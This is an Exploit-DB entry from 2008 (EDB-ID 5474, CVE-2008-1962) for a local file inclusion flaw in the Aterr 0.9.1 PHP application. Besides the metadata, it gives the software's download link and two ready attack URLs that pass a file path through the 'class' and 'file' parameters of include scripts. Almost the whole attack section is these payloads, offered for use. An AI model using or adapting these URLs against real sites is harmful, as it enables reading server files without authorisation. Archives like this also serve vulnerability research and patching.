Aterr 0.9.1 class Local File Inclusion Vulnerabilities php5

2008-04-19T00:00:00
ID EDB-ID:5474
Type exploitdb
Reporter KnocKout
Modified 2008-04-19T00:00:00

Description

Aterr 0.9.1 (class) Local File Inclusion Vulnerabilities (php5). CVE-2008-1962. Webapps exploit for php platform

                                        
                                            Atter 0.9.1 Local File Inclusion Vulnerability

#################################################

Author : KnocKout
ThanX : CW ALL USERS

=================================================

Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5

Attackz :

http://localsite.com/path/include/functions.inc.php?class=[Local File]
http://localsite.com/path/include/common.inc.php?file=[Local File]

#################################################

# milw0rm.com [2008-04-19]